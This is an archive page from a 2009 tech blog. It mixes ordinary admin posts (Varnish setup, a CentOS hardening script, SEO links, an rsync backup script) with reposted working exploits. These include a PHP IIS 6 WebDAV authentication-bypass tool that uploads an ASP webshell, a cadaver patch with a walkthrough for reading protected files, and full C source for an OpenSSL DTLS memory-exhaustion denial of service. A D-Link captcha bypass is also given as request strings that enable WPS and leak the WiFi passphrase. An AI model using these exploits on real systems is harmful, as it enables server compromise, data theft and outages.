May 22

Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

By jason Security Bulletin No Comments »

<?

print_r(‘
********  IIS 6 WEBDAV Exploit.By racle@tian6.com && Securiteweb.org  ********
                                                        
       Usage: php ‘.$argv[0].’ source/path/put host path   
       Example: php ‘.$argv[0].’ source www.tian6.com /blog/readme.asp       
       Example2: php ‘.$argv[0].’ path www.tian6.com /secret/
       Example3: php ‘.$argv[0].’ put www.tian6.com /secret/ test.txt(evil code as test.txt)
****************************************************************
‘);

//verification du debut
if($argv[1]!=”source”&&$argv[1]!=”path”&&$argv[1]!=”put”){echo “Choose a action,source or path or put.”;die;}
else {$action=$argv[1];}

if(stristr($argv[2],”http://”)){echo “No http:// in the host!”;die;}
else{$host=$argv[2];}

if(stristr($argv[3],”/”)==false){echo “Where is the / ?”;die;}
else{$path=$argv[3];}
//sent
function sent($sock)  
{  
global  $host, $html;  
$ock=fsockopen(gethostbyname($host),’80′);  
if (!$ock) {  
echo ‘No response from ‘.$host; die;  
}  
fputs($ock,$sock);  
$html=”;  
while (!feof($ock)) {  
$html.=fgets($ock);  
}  
fclose($ock);  
}  

if($action==”source”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af/”,$position,1);
 $sock=”GET “.$path.” HTTP/1.1\r\n”;
    $sock.=”Translate: f\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n\r\n”;
 sent($sock);
 echo $html;
 die;
 }
if($action==”path”){
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
 $sock=”PROPFIND  “.$path.” HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Content-Length: 0\r\n\r\n”;
    $sock.=’<?xml version=”1.0″ encoding=”utf-8″?><D:propfind xmlns:D=”DAV:”><D:prop xmlns:R=”http://www.foo.bar/boxschema/”><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>’;
    sent($sock);
 $bur=explode(“<a:href>”,$html);
    foreach($bur as $line){$no=strpos($line,”<”);$resultat.=substr($line,0,$no).”\n”;}
    echo $resultat;
 die;
    }
if($action==”put”){
 echo “Remember,keep urfile in type txt!\r\n\r\n”;
     $fp = fopen(“test.txt”, ‘r’);
  if($fp!=false){
     while (false!==($char = fgets($fp))) {
     $fir1=$char;
     }
     fclose($fp);
 $position=strrpos($path,”/”);
    $path=substr_replace($path,”%c0%af”,$position,0);
    $sock=”PUT “.$path.”test.txt HTTP/1.1\r\n”;
 $sock.=”Host: “.$host.”\r\n”;
 $sock.=’Content-Type: text/xml; charset=”utf-8″‘.”\r\n”;
 $sock.=”Connection:close\r\n”;
 $sock.=”Content-Length: “.strlen($fir1).”\r\n\r\n”;
    $sock.=”".$fir1.”\r\n”;
    echo $sock; sent($sock);sleep(2);
 $sock=”MOVE “.$path.”test.txt HTTP/1.1\r\n”;
    $sock.=”Host: “.$host.”\r\n”;
    $sock.=”Connection:close\r\n”;
 $sock.=”Destination: “.$path.”racle.asp\n\n”;
    sent($sock);
 echo “Be cool,man! Webshell is http://”.$host.$path.”racle.asp“;
 die;}
 else{die;}
 }

Tagged with:
May 21

Microsoft IIS6 WebDAV Remote Authentication Bypass Exploit (patch)

By jason Security Bulletin 1 Comment »

Blog with a detailed description:
# http://www.skullsecurity.org/blog/?p=285
#
# And the patch itself:
# http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
#
# > mkdir cadaver-h4x
# > cd cadaver-h4x
# > wget http://www.skullsecurity.org/blogdata/cadaver-0.23.2-h4x.patch
# –snip–
# > wget http://www.webdav.org/cadaver/cadaver-0.23.2.tar.gz
# –snip–
# > tar xzvf cadaver-0.23.2.tar.gz
# –snip–
# > cd cadaver-0.23.2/
# > patch -p1 < ../cadaver-0.23.2-h4x.patch
# patching file lib/neon/ne_basic.c
# patching file lib/neon/ne_request.c
# patching file lib/neon/ne_uri.c
# > ./configure
# –snip–
# > make
# –snip–
#
# Now we should have a patched, compiled version of cadaver, so start it
# up with the server that was identified as having a vulnerable folder
# earlier:
#
# > ./cadaver xxx.xxx.xxx.xxx
#
# This should drop you to a “dav:/>” prompt. Now just cd into the
# vulnerable folder and check out what’s there:
#
# dav:/> cd secret
# dav:/secret/> ls
# Listing collection `/secret/’: succeeded.
#        password.txt                           7  May 19 10:40
# dav:/secret/> cat password.txt
# Displaying `/secret/password.txt’:
# ron$pr0ns
# dav:/secret/>
#
# Here’s a list of commands that I’ve tested that work with the patched
# cadaver on a vulnerable folder:
# * CD
# * LS
# * MOVE
# * PUT
# * GET
# * CAT
# * DELETE

diff -rub cadaver-0.23.2/lib/neon/ne_basic.c cadaver-0.23.2-h4x/lib/neon/ne_basic.c
— cadaver-0.23.2/lib/neon/ne_basic.c    2008-02-07 16:22:07.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_basic.c    2009-05-20 16:13:46.000000000 -0500
@@ -402,7 +402,7 @@
     value = "infinity";
     break;
     }
-    ne_add_request_header(req, "Depth", value);
+    ne_add_request_header(req, "Depth", "1");
}
static int copy_or_move(ne_session *sess, int is_move, int overwrite,
diff -rub cadaver-0.23.2/lib/neon/ne_request.c cadaver-0.23.2-h4x/lib/neon/ne_request.c
— cadaver-0.23.2/lib/neon/ne_request.c    2008-01-30 05:35:52.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_request.c    2009-05-20 16:35:46.000000000 -0500
@@ -405,6 +405,7 @@
                            "Connection: TE" EOL
                            "TE: trailers" EOL);
     }
+    ne_buffer_czappend(req->headers, "Translate: f" EOL);
}
int ne_accept_always(void *userdata, ne_request *req, const ne_status *st)
@@ -420,6 +421,7 @@
ne_request *ne_request_create(ne_session *sess,
                   const char *method, const char *path)
{
+    char *path2 = ne_calloc(strlen(path)+7);
     ne_request *req = ne_calloc(sizeof *req);
     req->session = sess;
@@ -435,13 +437,18 @@
     req->method = ne_strdup(method);
     req->method_is_head = (strcmp(method, "HEAD") == 0);
+    if(strlen(path)>2)
+        sprintf(path2, "%c%c%%c0%%af%s", path[0], path[1], path+2);
+    else
+        path2 = path;
+
     /* Only use an absoluteURI here when absolutely necessary: some
      * servers can’t parse them. */
-    if (req->session->use_proxy && !req->session->use_ssl && path[0] == ‘/’)
+    if (req->session->use_proxy && !req->session->use_ssl && path2[0] == ‘/’)
     req->uri = ne_concat(req->session->scheme, "://",
-                 req->session->server.hostport, path, NULL);
+                 req->session->server.hostport, path2, NULL);
     else
-    req->uri = ne_strdup(path);
+    req->uri = ne_strdup(path2);
     {
     struct hook *hk;
diff -rub cadaver-0.23.2/lib/neon/ne_uri.c cadaver-0.23.2-h4x/lib/neon/ne_uri.c
— cadaver-0.23.2/lib/neon/ne_uri.c    2007-12-05 05:04:47.000000000 -0600
+++ cadaver-0.23.2-h4x/lib/neon/ne_uri.c    2009-05-20 16:13:46.000000000 -0500
@@ -96,7 +96,7 @@
/* 0xXX    x0      x2      x4      x6      x8      xA      xC      xE     */
/*   0x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
/*   1x */ OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT, OT,
-/*   2x */ OT, SD, OT, GD, SD, PC, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
+/*   2x */ OT, SD, OT, GD, SD, AL, SD, SD, SD, SD, SD, PS, SD, DS, DT, FS,
/*   3x */ DG, DG, DG, DG, DG, DG, DG, DG, DG, DG, CL, SD, OT, SD, OT, QU,
/*   4x */ AT, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL,
/*   5x */ AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, AL, GD, OT, GD, OT, US,

Tagged with:
May 20

Critical Mac OS X Java Vulnerabilities

By jason Security Bulletin No Comments »

Introduction

Five months ago, CVE-2008-5353 and other vulnerabilities were publicly
disclosed, and fixed by Sun.

CVE-2008-5353 allows malicious code to escape the Java sandbox and run
arbitrary commands with the permissions of the executing user. This may
result in untrusted Java applets executing arbitrary code  merely by
visiting a web page hosting the applet. The issue is trivially
exploitable.

Unfortunately, these vulnerabilities remain in Apple’s shipping JVMs, as
well as Soylatte 1.0.3. As Soylatte does not provide browser plugins,
the impact of the vulnerability is reduced. The recent release of
OpenJDK6/Mac OS X is not affected by CVE-2008-5353.

Work-Arounds

    * Mac OS X users should disable Java applets in their browsers and
      disable ‘Open "safe" files after downloading’ in Safari.
    * Soylatte users running untrusted code should upgrade to an
      OpenJDK6-based release, where possible. No future releases of the
      JRL-based Soylatte branch are planned at this time. If this is an
      issue for you, please feel free to contact me.
    * No work-around is available for users otherwise running Java
      untrusted code.

Proof of Concept

Unfortunately, it seems that many Mac OS X security issues are ignored
if the severity of the issue is not adequately demonstrated. Due to the
fact that an exploit for this issue is available in the wild, and the
vulnerability has been public knowledge for six months, I have decided
to release a my own proof of concept to demonstrate the issue.

If you visit the following page, "/usr/bin/say" will be executed on your
system by a Java applet, with your current user permissions. This link
will execute code on your system with your current user permissions. The
proof of concept runs on fully-patched PowerPC and Intel Mac OS X
systems.

http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html

compiled/decompiled: http://milw0rm.com/sploits/2009-javax.tgz

Tagged with:
May 19

Accelerate your web site to visit with varnish

By jason Load Balance 1 Comment »

Varnish is a state-of-the-art, high-performance HTTP accelerator. It uses the advanced features in Linux 2.6, FreeBSD 6/7 and Solaris 10 to achieve its high performance.

Some of the features include

  • A modern design
  • VCL – a very flexible configuration language
  • Load balance with health checking of backends
  • Partial support for ESI
  • URL rewriting
  • Graceful handling of "dead" backends

INSTALL:

1.download varnish-2.0.4.tar.gz
If you want the last version,you can hit here.

2.unzip varnish
tar zxvf varnish-2.0.4.tar.gz

3.compile varnish
cd varnish-2.0.4
./configure –prefix=/usr/local/varnish –enable-debugging-symbols –enable-developer-warnings –enable-dependency-tracking –enable-tests –enable-diagnostics
make
make install

4.create user:
adduser -s /sbin/nologin www

5.create cache directory &  log file
mkdir -p /var/vcache && chown www.www /var/vcache/
mkdir -p /usr/local/varnish/var/logs && chown www.www /usr/local/varnish/var/logs

6.create config file:
vcl.conf
backend photo1 {
       .host = "10.0.5.33";
       .port = "80";
        .probe = {
                .url = "/guide.php";
                .timeout = 50ms;
                .interval = 5s;
                .window = 10;
                .threshold = 8;
        }
}
backend photo2 {
       .host = "10.0.7.33";
       .port = "80";
        .probe = {
                .url = "/guide.php";
               .timeout = 50ms;
                .interval = 5s;
                .window = 10;
                .threshold = 8;
        }
}
director photo_director round-robin {
    { .backend = photo1; }
    { .backend = photo2; }
}
acl purge {
       "localhost";
       "127.0.0.1";
       "10.0.0.0"/16;
}

sub vcl_recv {
       if (req.request == "PURGE") {
               if (client.ip ~ purge) {
                       purge_url(req.url);
                }
                else{
                        error 200 "Purged";
                }
       }
       if (req.url ~ "\.(gif|jpg|jpeg|bmp)$") {
                unset req.http.cookie;
                unset req.http.authenticate;
                set req.backend = photo_director;
       }
}

sub vcl_hit {
       if (req.request == "PURGE") {
               set obj.ttl = 0s;
               error 200 "Purged.";
       }
        deliver;
}

sub vcl_hash {
    set req.hash += req.url;
    set req.hash += req.http.host;
    set req.hash += req.http.cookie;
    hash;
}

sub vcl_miss {
       if (req.request == "PURGE") {
               error 404 "Not in cache.";
       }
}

sub vcl_fetch {
    if (!obj.cacheable) {
        pass;
    }
    if (obj.http.Pragma ~ "no-cache" || obj.http.Cache-Control ~ "no-cache" || obj.http.Cache-Control ~ "private") {
        pass;
    }
    deliver;
}

7.Optimize the kernel parameters:
net.ipv4.ip_local_port_range = 1024 65536
net.core.rmem_max=16777216
net.core.wmem_max=16777216
net.ipv4.tcp_rmem=4096 87380 16777216
net.ipv4.tcp_wmem=4096 65536 16777216
net.ipv4.tcp_fin_timeout = 3
net.ipv4.tcp_tw_recycle = 1
net.core.netdev_max_backlog = 30000
net.ipv4.tcp_no_metrics_save=1
net.core.somaxconn = 262144
net.ipv4.tcp_syncookies = 0
net.ipv4.tcp_max_orphans = 262144
net.ipv4.tcp_max_syn_backlog = 262144
net.ipv4.tcp_synack_retries = 2
net.ipv4.tcp_syn_retries = 2

8.Start varnish:
#!/bin/sh
ulimit -SHn 51200
/usr/local/varnish/sbin/varnishd -n /var/vcache -f /usr/local/varnish/vcl-php.conf -a 0.0.0.0:80 -s malloc -g www -u www -w 500,10000,15 -T 127.0.0.1:3500 -p client_http11=on -plisten_depth=4096 -p lru_interval=3600  -h classic,500009 -p obj_workspace=2048
/usr/local/varnish/bin/varnishncsa -n /var/vcache -w /usr/local/varnish/var/logs/varnish.log &

More Detail

Tagged with:
May 19

Make linux security with a script

By jason Shell Script No Comments »

In order to improve the security of the operating system, while improving the efficiency of the script I wrote, I hope you can help.
The primary function of this script to stop unwanted services, including, modification of the core security-related parameters, modify the parameters of other applications.

OS:CentOS4/5
Code:

#!/bin/sh

###################################################################################
#    Security Script for RedHat Linux
#    Author:jason
#    Date:2009/05/20
#
##################################################################################

#—————————–Define Variable————————————-
LANG=EN
DATETIME=`date +%Y%m%d-%M%S`
SERVICES=(autofs firstboot cups gpm nfs nfslock xfs netfs sendmail yum-updatesd restrorecond mcstrans avahi-daemon anacron)
MD5SUM=(ps netstat ls last w ifconfig tcpdump iptraf top swatch nice lastb md5sum name)
IPV6=$(ifconfig | grep "inet6")
Filename=`ifconfig -a |grep inet |grep -v "127.0.0.1" |awk ‘{print $2}’| head -1 | awk -F":" ‘{ print $2}’`-$DATETIME-md5
BKDir=/var/ikerbk

#—————————-Create report/back Directory————————-
mkdir -p /var/ikerbk

#—————————-Modify Default Language——————————
echo -n "modfiy env_LANG"
if [ -f /etc/sysconfig/i18n ]; then
cp /etc/sysconfig/i18n $BKDir/$DATETIME\_i18n
Lang=`grep "^LANG=" /etc/sysconfig/i18n`
Lang1=`grep "^SUPPORTED="        /etc/sysconfig/i18n`
Lang2=`grep "^SYSFONT="  /etc/sysconfig/i18n`
        if [ -z "$Lang" ]; then
        sed -i ’1i\LANG="en_US.UTF-8"’ /etc/sysconfig/i18n
        echo " : insert [OK]"
        else
        sed -i ‘s/LANG=.*/LANG="en_US.UTF-8"/g’ /etc/sysconfig/i18n
        echo " : modfiy [OK]"
        fi

        if [ -z "$Lang1" ]; then
        sed -i ’1a\SUPPORTED="en_US.UTF-8:en_US:en"’ /etc/sysconfig/i18n
        echo "SUPPORTED insert [OK]"
        else
        sed -i ‘s/SUPPORTED=.*/SUPPORTED="en_US.UTF-8:en_US:en"/g’ /etc/sysconfig/i18n
        echo "SUPPORTED modfiy [OK]"
        fi

        if [ -z "$Lang2" ]; then
        sed -i ’1a\SYSFONT="latarcyrheb-sun16"’ /etc/sysconfig/i18n
        echo "SYSFONT insert [OK]"
        else
        sed -i ‘s/SYSFONT=.*/SYSFONT="latarcyrheb-sun16"/g’ /etc/sysconfig/i18n
        echo "SYSFONT modfiy [OK]"
        fi
else
        echo " : File /etc/sysconfig/i18n not exist [False]"
fi

#—————————–SSH Protocol 2————————————
echo -n "change sshd <Protocol 2>"
if [ -f /etc/ssh/sshd_config ] ; then
cp /etc/ssh/sshd_config $BKDir/$DATETIME-sshd_config
Proto=`sed -n ‘/^Protocol/p’ /etc/ssh/sshd_config`
Proto1=`sed -n ‘/^Protocol/p’ /etc/ssh/sshd_config | awk ‘{ print $2 }’`
if [ -z "$Proto" ]; then
        sed -i ’1i\Protocol 2\’ /etc/ssh/sshd_config
        echo "  [OK]"
        elif [ "$Proto1" != "2" ]; then
        sed -i "s/^$Proto/Protocol 2/g" /etc/ssh/sshd_config
        echo "  [OK]"
fi
else
        echo "  :File /etc/ssh/sshd_config not exist [False]"
fi

#—————————–Stop Unuse Services———————————
for x in "${SERVICES[@]}"; do
    state1=`chkconfig –list | grep $x | awk ‘{print substr($5,3,5)}’`
    if [ "$state1" == "on" ]; then
        service $x stop
                 chkconfig –level 3 $x off
       else
              echo "$x state is stop [OK]"
       fi
done

#—————————–Force Password Lenth——————————–
echo -n "change <password> length"
if [ -f /etc/login.defs ]; then
cp /etc/login.defs $BKDir/$DATETIME\_login.defs
        sed -i ‘s/PASS_MIN_LEN.*5/PASS_MIN_LEN  8/’ /etc/login.defs
        echo "   [OK]"
else
        echo " :File /etc/login.defs not exist [False]"
fi

#—————————-Define SSH Session TIMEOUT—————————
echo -n "modfiy Histsize and TMOUT"
if [ -f /etc/profile ]; then
cp /etc/profile $BKDir/$DATETIME\_profile
        sed -i ‘s/HISTSIZE=.*/HISTSIZE=128/’ /etc/profile
        echo "  [OK]"

        Timeout=`grep "TMOUT=" /etc/profile`
        if [ -z $Timeout ] ; then
        echo "TMOUT=900" >> /etc/profile
        else
        sed -i ‘s/.*TMOUT=.*/TMOUT=300/g’ /etc/profile
        fi
else
        echo "  :File /etc/profile not exist [False]"
fi

#—————————–Check tmp Directory Stick—————————
if [ -d /tmp/ ]; then
echo -n "modfiy /tmp/ +t"
chmod +t /tmp/
echo  " [OK]"
else
        mkdir /tmp &&   chmod 777 /tmp && chmod +t /tmp
        echo "  [mkdir /tmp]"
fi

#—————————–Close tty4/5/6————————————–
echo -n "modify Control-Alt-Delete"
if [ -f /etc/inittab ]; then
cp /etc/inittab  $BKDir/$DATETIME\_inittab
sed -i  ‘s/\(^ca\:\:ctrlaltdel\:\/sbin\/shutdown.*\)/#\1/g’ /etc/inittab
sed -i  ‘s/\(^4:2345:respawn.*\)/#\1/g’ /etc/inittab
sed -i  ‘s/\(^5:2345:respawn.*\)/#\1/g’ /etc/inittab
sed -i  ‘s/\(^6:2345:respawn.*\)/#\1/g’ /etc/inittab
    echo " : Control-Alt-Delete AND tty-456 [OK]"
        else
        echo "file /etc/inittab NOT EXIST"
fi

#—————————–Clean Console Information—————————
echo -n "Clean boot infomation"
Check=`sed -n ‘/issue.net/p’ /etc/rc.local`
if [ -f /etc/issue -a -f /etc/issue.net ]; then
    echo "" >  /etc/issue
       echo "" >  /etc/issue.net
    if [ -z "$Check" ]; then
        echo ‘echo "" >  /etc/issue’    >> /etc/rc.local
        echo ‘echo "" >  /etc/issue.net’        >> /etc/rc.local
        echo    "   [OK]"
    fi
else
        echo "  :File /etc/issue or /etc/issue.net not exist [False]"
fi

#—————————-Close IPV6——————————————-
if [ -n "$IPV6" ]; then
        if [ -f /etc/sysconfig/network -a -f /etc/modprobe.conf ]; then
        cp /etc/sysconfig/network $BKDir/$DATETIME\_network
        cp /etc/modprobe.conf   $BKDir/$DATETIME\_modprobe.conf
                Netipv6=`grep "^NETWORKING_IPV6=yes" /etc/sysconfig/network`
                echo -n "modfiy ipv6 clean"
                if [ -z $Netipv6 ]; then
                        echo "  already [OK]"
                else
                        sed -i ‘s/^NETWORKING_IPV6=yes/NETWORKING_IPV6=no/g’ /etc/sysconfig/network
                        echo "  [OK]"
                fi
                        Ipv6mod=`sed -n  ‘/^alias.*ipv6.*off/p’ /etc/modprobe.conf`
                        echo -n "modfiy ipv6_mod clean"
                if [ -z "$Ipv6mod" ]; then
                 echo "
alias net-pf-10 off
alias ipv6 off"  >> /etc/modprobe.conf
                echo "  [OK]"
                else
                echo "  IPV6 mod already [OK]"
                fi
        else "File /etc/sysconfig/network or /etc/modprobe.conf not exist [False]"
        fi
else
        echo "IPV6 not support [OK]"
fi

#—————–Protect File passwd/shadow/group/gshadow/services—————
echo -n "modfiy passwd_file +i "
chattr +i /etc/passwd
chattr +i /etc/shadow
chattr +i /etc/group
chattr +i /etc/gshadow
chattr +i /etc/services
echo    "  [OK]"

#——————————Clean Command History——————————
echo -n "modify bash_history"
if [ -f /root/.bash_logout ]; then
        LOGOUT=`grep "rm -f" /root/.bash_logout`
        if  [ -z "$LOGOUT" ] ; then
        sed -i ‘/clear/i \rm -f  $HOME/.bash_history’ /root/.bash_logout
        echo "    [OK]"
        else
        echo "  Already [OK]"
        fi
else
        echo "  :File /root/.bash_logout not exist [False]"
fi

#—————————–Group wheel su root———————————
echo -n "modify su root"
if [ -f /etc/pam.d/su ]; then
cp /etc/pam.d/su $BKDir/$DATETIME\_su
        sed -i ‘s/.*pam_wheel.so use_uid$/auth           required        pam_wheel.so use_uid/’ /etc/pam.d/su
        echo "  [OK]"
else
        echo "  :File /etc/pam.d/su not exist [False]"
fi

#————————Modify Kernel Parameters About Security——————
echo -n "modfiy /etc/sysctl.conf"
if [ -f /etc/sysctl.conf ]; then
cp /etc/sysctl.conf $BKDir/$DATETIME\_sysctl.conf
Net=(net.ipv4.ip_forward
net.ipv4.conf.all.accept_source_route
net.ipv4.conf.all.accept_redirects
net.ipv4.tcp_syncookies
net.ipv4.conf.all.log_martians
net.ipv4.icmp_echo_ignore_broadcasts
net.ipv4.icmp_ignore_bogus_error_responses
net.ipv4.conf.all.rp_filter)
for i in "${Net[@]::3}"; do
Zero=`sed  -n "/^$i/p" /etc/sysctl.conf | awk -F"="  ‘{ print $2 }’ | sed ‘s/ //g’`
Zero1=`sed  -n "/^$i/p" /etc/sysctl.conf`
                if [ -z "$Zero" ]; then
                        if [ -z "$Zero1" ];then
                        echo "$i = 0" >> /etc/sysctl.conf
                        echo "$i is [OK]"
                        else
                        sed -i "s/$i.*/$i = 0/g" /etc/sysctl.conf
                        echo "$i is [OK]"
                        fi
                fi
        if [ "$Zero" == "0" ]; then
        echo "$i is [OK]"
        else
        sed -i "s/$i.*/$i = 0/g" /etc/sysctl.conf
        fi
done

for i in "${Net[@]:3}"; do
One=`sed  -n "/^$i/p" /etc/sysctl.conf | awk -F"="  ‘{ print $2 }’ | sed ‘s/ //g’`
One1=`sed  -n "/^$i/p" /etc/sysctl.conf`
                if [ -z "$One" ]; then
                        if [ -z "$One1" ];then
                        echo "$i = 1" >> /etc/sysctl.conf
                        echo "$i is [OK]"
                        else
                        sed -i "s/$i.*/$i = 1/g" /etc/sysctl.conf
                        echo "$i is [OK]"
                        fi
                fi
        if [ "$One" == "1" ]; then
        echo "$i is [OK]"
        else
        sed -i "s/$i.*/$i = 1/g" /etc/sysctl.conf
        fi
done

else
        echo ":File /etc/sysctl.conf not exist [Flase]"
fi

sysctl -p >> $BKDir/$Filename
init q

Tagged with:
May 18

OpenSSL DTLS Remote Memory Exhaustion DoS

By jason Security Bulletin No Comments »

Version: OpenSSL <= 0.9.8k, 1.0.0-beta2

*Usage:
Pass the host and port of the target DTLS server:
$ gcc cve-2009-1378.c -o cve-2009-1378
$ ./cve-2009-1378 1.2.3.4 666

Exploit Code: 

/*
 * cve-2009-1378.c
 *
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1378
 *
 *   In dtls1_process_out_of_seq_message() the check if the current message is
 *   already buffered was missing. For every new message was memory allocated,
 *   allowing an attacker to perform an denial of service attack with sending
 *   out of seq handshake messages until there is no memory left.
 *
 * Notes:
 *
 *   With a MTU of 1500, the attack leaks 1503 bytes of memory with each UDP
 *   datagram.  If you have a bigger MTU than 1500, feel free to set it.
 *
 *   Complete memory exhaustion may take a while depending on the throughput
 *   to the target and the amount of memory it has.  By default, we'll just
 *   continue sending datagrams indefinitely.
 *
 */

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>

#define MTU 1500

#define IP_HDR_LEN 20
#define UDP_HDR_LEN 8
#define MAX_LEN (MTU - IP_HDR_LEN - UDP_HDR_LEN)

#define put16(b, data) ( \
        (*(b) = ((data) >> 8) & 0xff), \
        (*((b)+1) = (data) & 0xff))

int
main(int argc, char **argv)
{
	int sock, ret;
	char *ptr, *err;
	struct hostent *h;
	struct sockaddr_in target;
	char buf[MAX_LEN];

	if (argc < 3) {
		err = "Pass the host and port of the target DTLS server";
		printf("[-] Error: %s\n", err);
		exit(1);
	}

	h = gethostbyname(argv[1]);
	if (!h) {
		err = "Unknown host specified";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	target.sin_family = h->h_addrtype;
	memcpy(&target.sin_addr.s_addr, h->h_addr_list[0], h->h_length);
	target.sin_port = htons(atoi(argv[2]));

	sock = socket(AF_INET, SOCK_DGRAM, 0);
	if (sock == -1) {
		err = "Failed creating UDP socket";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	ret = connect(sock, (struct sockaddr *) &target, sizeof(target));
	if (ret == -1) {
		err = "Failed to connect socket";
		printf("[-] Error: %s (%s)\n", err, strerror(errno));
		exit(1);
	}

	ptr = buf;

	/* header  */
	memcpy(ptr, "\x16\xfe\xff\x00\x00\x00\x00\x00\x00\x00\x00", 11);
	ptr += 11;

	/* packet length */
	put16(ptr, MAX_LEN - ((ptr - buf) + 2));
	ptr += 2;

	/* client hello */
	memcpy(ptr, "\x01", 1);
	ptr += 1;

	/* length */
	memcpy(ptr, "\x00", 1);
	ptr += 1;
	put16(ptr, MAX_LEN - ((ptr - buf) + 2 + 8));
	ptr += 2;

	/* sequence number */
	memcpy(ptr, "\x00\x01", 2);
	ptr += 2;

	/* frag offset */
	memcpy(ptr, "\x00\x00\x00", 3);
	ptr += 3;

	/* length */
	memcpy(ptr, "\x00", 1);
	ptr += 1;
	put16(ptr, MAX_LEN - ((ptr - buf) + 2));
	ptr += 2;

	/* payload */
	memset(ptr, '\x00', MAX_LEN - (ptr - buf));

	printf("[+] Firing loads of packets at %s:%s...\n", argv[1], argv[2]);

	while (1) {
		send(sock, buf, MAX_LEN, 0);
	}

	close(sock);

	return 0;
}
Tagged with:
May 17

D-Link Captcha Bypass

By jason Security Bulletin No Comments »

D-Link released new firmware designed to protect against malware that
alters DNS settings by logging in to the router using default administrative
credentials. There is a flaw in the captcha authentication system that allows
an attacker to glean your WiFi WPA pass phrase from the router with only user-level
access, and without properly solving the captcha.

When you login with the captcha enabled, the request looks like this:

GET /post_login.xmlhash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a&auth_code=0C52
F&auth_id=268D2

The hash is a salted MD5 hash of your password, the auth_code is the captcha value that
you entered, and the auth_id is unique to the captcha image that you viewed
(this presumably allows the router to check the auth_code against the proper captcha image).
The problem is that if you leave off the auth_code and auth_id values, some pages in the
D-Link Web interface think that you’ve properly authenticated, as long as you get
the hash right:

    GET /post_login.xml?hash=c85d324a36fbb6bc88e43ba8d88b10486c9a286a

Most notably, once you’ve made the request to post_login.xml, you can activate WPS with the following request:

    GET /wifisc_add_sta.xml?method=pbutton&wps_ap_ix=0

When WPS is activated, anyone within WiFi range can claim to be a valid WPS client and
retrieve the WPA passphrase directly from the router.

More info on WPS et al. at http://www.sourcesec.com/2009/05/12/d-link-captcha-partially-broken/

Tagged with:
May 17

FREE Search Engine Submitter

By jason Search Engines World No Comments »

Our free search engine submission service sends your website URL to over 20 major search portals. For best results, resubmit your information about once a month.

FREE Search Engine Submitter!
Submit Your Site to 20 Engines!
URL:
Email:
 
Trafficzap.com Free Traffic
Tagged with:
May 16

top seven seo tools

By jason Search Engines World No Comments »

http://www.webconfs.com/backlink-builder.php
Enter the core keywords, feedback that can be submitted in the above web site for similar resources, to increase the breadth of web site links.

Search engine submission tool (one-time submission to multiple search engines)
http://www.submitexpress.com/submit.html
http://www.goitworld.com/free-search-engine-submitter/

Google Keyword search case query (keyword generation tool)
https://adwords.google.com/select/KeywordSandbox
Shows that the core of a user’s search keywords and the keywords combinations matching the expansion of a broad vocabulary for advertisers to use the tool to

generate keywords and recommendations.

Overture Keyword Suggestion Tool
http://inventory.overture.com
Query keywords can be revealed in the last month the estimated number of users to retrieve.

External links and web pages are search engine testing tools included
http://www.uptimebot.com
Web site can often be the result of the promotion of external links and search engine included in the link is displayed.

Search Engine Spider Simulator
http://www.webconfs.com/search-engine-spider-simulator.php
Google spider to detect the page to read the text, as well as access to all the links, to help diagnose whether important content can be search engines to

crawl into.

The relationship between the English search engine decoder
http://www.search-this.com/search_engine_decoder.asp
A clear understanding of the complex between the English search engine relationship.

Tagged with:
May 15

Script to do incremental rsync backups

By jason Shell Script 1 Comment »

rsync is an open source utility that provides fast incremental file transfer. rsync is freely available under the GNU General Public License and is currently being maintained by Wayne Davison.

Here is a script of do incremental backup by rsync. Hope it can help you.
Test OS:Centos4,5 RedHatAS4,5

#!/bin/sh

#########################################################
# Script to do incremental rsync backups
# Adapted from script found on the rsync.samba.org
# Jason 3/24/2002
# This script is freely distributed under the GPL
#########################################################

##################################
# Configure These Options
##################################

###################################
# mail address for status updates
#  – This is used to email you a status report
###################################
MAILADDR=your_mail_address_here

###################################
# HOSTNAME
#  – This is also used for reporting
###################################
HOSTNAME=your_hostname_here

###################################
# directory to backup
# – This is the path to the directory you want to archive
###################################
BACKUPDIR=directory_you_want_to_backup

###################################
# excludes file – contains one wildcard pattern per line of files to exclude
#  – This is a rsync exclude file.  See the rsync man page and/or the
#    example_exclude_file
###################################
EXCLUDES=example_exclude_file

###################################
# root directory to for backup stuff
###################################
ARCHIVEROOT=directory_to_backup_to

#########################################
# From here on out, you probably don’t  #
#   want to change anything unless you  #
#   know what you’re doing.             #
#########################################

# directory which holds our current datastore
CURRENT=main

# directory which we save incremental changes to
INCREMENTDIR=`date +%Y-%m-%d`

# options to pass to rsync
OPTIONS="–force –ignore-errors –delete –delete-excluded \
–exclude-from=$EXCLUDES –backup –backup-dir=$ARCHIVEROOT/$INCREMENTDIR -av"

export PATH=$PATH:/bin:/usr/bin:/usr/local/bin

# make sure our backup tree exists
install -d $ARCHIVEROOT/$CURRENT

